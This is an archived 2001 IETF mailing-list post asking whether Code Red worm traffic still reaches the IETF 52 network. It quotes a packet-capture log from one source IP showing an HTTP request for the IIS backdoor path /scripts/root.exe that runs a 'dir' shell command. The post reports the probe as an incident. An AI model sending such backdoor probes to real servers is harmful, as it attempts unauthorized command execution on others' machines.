ietf
[Top] [All Lists]

Code Red still at IETF 52 ?

2001-12-10 10:30:03
It seems that we still have some code red attacks coming into the
IETF 52 network.  Does 12.234.20.53 happen to be a machine owned
by Novell ?

Dec 10 21:57:13 voojagig tcpsuck[1110]: Data from UNKNOWN (12.234.20.53)
port 4774 to http (port 80)
Dec 10 21:57:13 voojagig tcpsuck[1110]:    0- 47455420 2f736372 69707473
2f726f6f     GET /scripts/roo
Dec 10 21:57:13 voojagig tcpsuck[1110]:   16- 742e6578 653f2f63 2b646972
20485454     t.exe?/c+dir HTT
Dec 10 21:57:13 voojagig tcpsuck[1110]:   32- 502f312e 300d0a48 6f73743a
20777777     P/1.0..Host: www
Dec 10 21:57:13 voojagig tcpsuck[1110]:   48- 0d0a436f 6e6e6e65 6374696f
6e3a2063     ..Connnection: c
Dec 10 21:57:13 voojagig tcpsuck[1110]:   64- 6c6f7365 0d0a0d0a

-- 
/amlan



<Prev in Thread] Current Thread [Next in Thread>